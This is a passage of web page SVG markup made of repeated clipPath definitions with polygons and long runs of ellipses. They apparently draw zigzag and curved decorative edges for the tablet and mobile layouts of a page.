ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.86925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.87875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.88825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8977499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.90725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.91675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.92625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.93575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.9452499999999999" rx="0.76" ry="0.004750"></ellipse></clipPath><clipPath id="clip-tablet-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-bottom" clipPathUnits="objectBoundingBox" data-screen="tablet-" decoration-type="none" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-tablet-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon></clipPath><clipPath id="clip-tablet-left-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-left" clipPathUnits="objectBoundingBox" data-screen="tablet-" pointer-width="29" pointer-height="66" style="curves" decoration-type="none" clip-path="url(#clip-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.66" cy="0.158333" rx="0.66" ry="0.158333"></ellipse><ellipse cx="0.66" cy="0.474999" rx="0.66" ry="0.158333"></ellipse><ellipse cx="0.66" cy="0.7916650000000001" rx="0.66" ry="0.158333"></ellipse></clipPath><clipPath id="clip-tablet-mobile-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-mobile-bottom" clipPathUnits="objectBoundingBox" data-screen="tablet-" decoration-type="divider" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-tablet-mobile-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 0.95, 0.76 0.95, 0.76 0.95, 0.766 1, 0.772 0.95, 0.778 1, 0.784 0.95, 0.79 1, 0.796 0.95, 0.802 1, 0.808 0.95, 0.8140000000000001 1, 0.8200000000000001 0.95, 0.8260000000000001 1, 0.8320000000000001 0.95, 0.838 1, 0.844 0.95, 0.85 1, 0.856 0.95, 0.862 1, 0.868 0.95, 0.874 1, 0.88 0.95, 0.886 1, 0.892 0.95, 0.898 1, 0.904 0.95, 0.91 1, 0.916 0.95, 0.922 1, 0.928 0.95, 0.934 1, 0.94 0.95, 0.946 1, 0.952 0.95, 0.958 1, 0.964 0.95, 0.97 1, 0.976 0.95, 0.982 1, 0.988 0.95, 0.994 1, 1 0.95, 1 0"></polygon></clipPath><clipPath id="clip-tablet-mobile-left-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-mobile-left" clipPathUnits="objectBoundingBox" data-screen="tablet-" pointer-width="1" pointer-height="76" style="curves" decoration-type="none" clip-path="url(#clip-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.76" cy="0.00475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.014249999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.02375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.03325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.042749999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.05225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.06175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.07125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.08075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09974999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.10925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.11875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.12825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.13774999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.14725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.15675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.16625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.17575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.18525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.19475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.20425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.21375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.22325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.23274999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.24225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.25175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.26125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.27075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.29925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.30874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.31825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.32775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.33725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.34675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.35625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.36574999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.37525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.38475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.39425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.40375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.41325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.42275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.43224999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.44175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.45125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.46075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.48924999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.49874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.50825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5177499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.52725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.53675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.54625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.55575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.56525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.57475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5842499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.59375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.60325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.61275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.62225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.63175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.64125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.6507499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.67925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.68875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.69825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.70775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7172499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.72675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.73625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.74575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.75525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7647499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.77425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.78375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.79325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.80275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.81225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.82175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8312499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.84075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.86925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.87875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.88825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8977499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.90725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.91675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.92625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.93575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.9452499999999999" rx="0.76" ry="0.004750"></ellipse></clipPath><clipPath id="clip-right-5u9uc4t2rbz31" class="decoration-clip clip-path-right" clipPathUnits="objectBoundingBox" data-screen="" pointer-width="3" pointer-height="89" style="curves" decoration-type="none"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.10999999999999999" cy="0.014394" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.043182" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.07197" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.100758" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.129546" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.158334" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.187122" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.21591000000000002" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.244698" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.273486" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.302274" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.331062" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.35985" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.38863800000000004" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.417426" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.446214" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.47500200000000004" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.5037900000000001" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.532578" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.561366" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.5901540000000001" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.618942" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.64773" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.6765180000000001" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.705306" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.734094" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.7628820000000001" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.79167" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.820458" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.8492460000000001" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.878034" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.906822" rx="0.89" ry="0.014394"></ellipse><ellipse cx="0.10999999999999999" cy="0.93561" rx="0.89" ry="0.014394"></ellipse></clipPath><clipPath id="clip-tablet-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-bottom" clipPathUnits="objectBoundingBox" data-screen="tablet-" decoration-type="none" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-tablet-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon></clipPath><clipPath id="clip-tablet-left-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-left" clipPathUnits="objectBoundingBox" data-screen="tablet-" pointer-width="1" pointer-height="76" style="curves" decoration-type="none" clip-path="url(#clip-tablet-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.76" cy="0.00475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.014249999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.02375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.03325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.042749999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.05225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.06175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.07125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.08075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09974999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.10925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.11875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.12825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.13774999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.14725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.15675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.16625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.17575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.18525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.19475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.20425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.21375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.22325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.23274999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.24225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.25175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.26125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.27075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.29925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.30874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.31825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.32775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.33725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.34675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.35625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.36574999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.37525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.38475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.39425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.40375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.41325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.42275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.43224999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.44175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.45125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.46075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.48924999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.49874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.50825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5177499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.52725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.53675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.54625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.55575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.56525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.57475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5842499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.59375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.60325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.61275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.62225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.63175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.64125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.6507499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.67925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.68875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.69825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.70775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7172499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.72675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.73625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.74575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.75525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7647499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.77425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.78375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.79325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.80275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.81225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.82175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8312499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.84075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.86925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.87875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.88825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8977499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.90725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.91675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.92625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.93575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.9452499999999999" rx="0.76" ry="0.004750"></ellipse></clipPath><clipPath id="clip-tablet-mobile-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-mobile-bottom" clipPathUnits="objectBoundingBox" data-screen="tablet-" decoration-type="divider" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-tablet-mobile-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 0.95, 0.76 0.95, 0.76 0.95, 0.766 1, 0.772 0.95, 0.778 1, 0.784 0.95, 0.79 1, 0.796 0.95, 0.802 1, 0.808 0.95, 0.8140000000000001 1, 0.8200000000000001 0.95, 0.8260000000000001 1, 0.8320000000000001 0.95, 0.838 1, 0.844 0.95, 0.85 1, 0.856 0.95, 0.862 1, 0.868 0.95, 0.874 1, 0.88 0.95, 0.886 1, 0.892 0.95, 0.898 1, 0.904 0.95, 0.91 1, 0.916 0.95, 0.922 1, 0.928 0.95, 0.934 1, 0.94 0.95, 0.946 1, 0.952 0.95, 0.958 1, 0.964 0.95, 0.97 1, 0.976 0.95, 0.982 1, 0.988 0.95, 0.994 1, 1 0.95, 1 0"></polygon></clipPath><clipPath id="clip-tablet-mobile-left-5u9uc4t2rbz31" class="decoration-clip clip-path-tablet-mobile-left" clipPathUnits="objectBoundingBox" data-screen="tablet-" pointer-width="1" pointer-height="76" style="curves" decoration-type="none" clip-path="url(#clip-tablet-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.76" cy="0.00475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.014249999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.02375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.03325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.042749999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.05225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.06175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.07125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.08075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09974999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.10925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.11875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.12825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.13774999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.14725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.15675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.16625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.17575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.18525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.19475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.20425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.21375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.22325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.23274999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.24225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.25175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.26125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.27075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.29925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.30874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.31825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.32775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.33725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.34675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.35625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.36574999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.37525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.38475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.39425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.40375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.41325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.42275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.43224999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.44175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.45125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.46075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.48924999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.49874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.50825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5177499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.52725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.53675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.54625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.55575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.56525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.57475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5842499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.59375" 